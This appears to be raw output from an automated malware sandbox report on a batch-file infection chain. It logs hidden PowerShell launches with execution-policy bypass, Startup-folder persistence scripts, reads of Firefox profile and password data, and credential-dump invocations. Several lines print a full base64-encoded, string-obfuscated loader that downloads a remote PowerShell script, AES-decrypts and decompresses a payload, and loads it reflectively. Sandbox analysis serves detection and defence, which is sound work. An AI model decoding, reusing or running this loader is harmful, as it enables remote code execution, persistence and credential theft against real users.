              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3708:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_km2czv1j.owr.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tOpxHK0Z2U.bat" "
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: powershell.exe, powershell.exe, 00000008.00000002.1524928935.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: powershell.exe, 00000007.00000002.1530245743.0000000003685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_8-33223
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tOpxHK0Z2U.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWN